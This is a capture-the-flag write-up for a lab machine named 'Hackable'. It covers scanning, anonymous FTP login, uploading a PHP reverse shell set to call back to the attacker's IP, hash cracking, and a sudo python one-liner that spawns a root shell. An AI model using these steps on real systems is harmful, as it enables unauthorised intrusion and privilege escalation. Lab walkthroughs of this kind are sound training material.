🚩🚨Hackable || Write UP🚨
Furkan Sayyed
Description
difficulty: easy
Phase 1: Reconnaissance
For getting the target machine IP Address,I am using arp-scan to scan my local network in my case its Virtual Box NAT connection as both machines are on same NAT
Target IP is 192.168.100.6 as other IP as used for DHCP services and gateways by VirtualBox
Phase 2:Scanning the Target Machine
I will be using nmap for scanning the target machine
nmap -sV 192.168.100.6
I got the 21,22 and 80 port opened in the target machine, I will be begin with http port 80, by using target ip in browser
I will be using Go Buster to get the hidden dir’s / endpoints
It seems their is only 1 endpoint that is /files/ but it does not have any interesting stuff just a plain html file
Let’s scan the target machine with script enabled nmap scan as we got the ftp and ssh port is open let see we get any vulnerability in those:
Here we go we got the FTP config vulnerability that is anonymous login is allowed, lets exploit it.
Phase 3: Exploitation
Login to ftp using anonymous as user and password
Now we have ftp shell on, now I will try to get the reverse shell connection using php shell script. I am using the webshell script available in kali in path /usr/share/webshells/php
Now i will upload it on server using ftp connection with following values:
$ip = '192.168.100.5';
$port \= 1234;
$ip → IP address of my attacking machine
$port → Port number of my attacking machine that will be used for listening connection
The reverse shell file is uploaded successfully, we can execute using 192.168.100.6/files/rev.php in browser
Here I got the reverse shell and I am user www-data
Phase 4:Privilege Escalation
Now lets see what user are available in system
So we have only one user that is shrek and a file in /home lets try to open the important.txt file
The file important.txt says to run a script and it gives the hashed pasword for shrek user
Now let’s detect the hash and try to crack it
So hash algorithm can be any of these, lets try crackstation to get the plain text value
Here we got the password for the shrek user, lets use ssh to login as shrek
SSH Session started, now we have to get the root Privilege to get the flag that is /root,
To get the current user sudo Privilege for program using sudo -l command
here i will be using GTFOBins to get the binaries exploits for linux systems
Now i will copy the given command and paste it in target machine and let’s see if this works or not
I modified the command little bit and got the root shell:
# command
sudo python3.5 -c 'import os; os.system("/bin/sh")'
Here we got our flag that is just a ASCII art…
Hope, you get it interesting, although it is very much easy but quite fun to solve it…
Subscribe to my newsletter
Read articles from Furkan Sayyed directly inside your inbox. Subscribe to the newsletter, and don't miss out.
Written by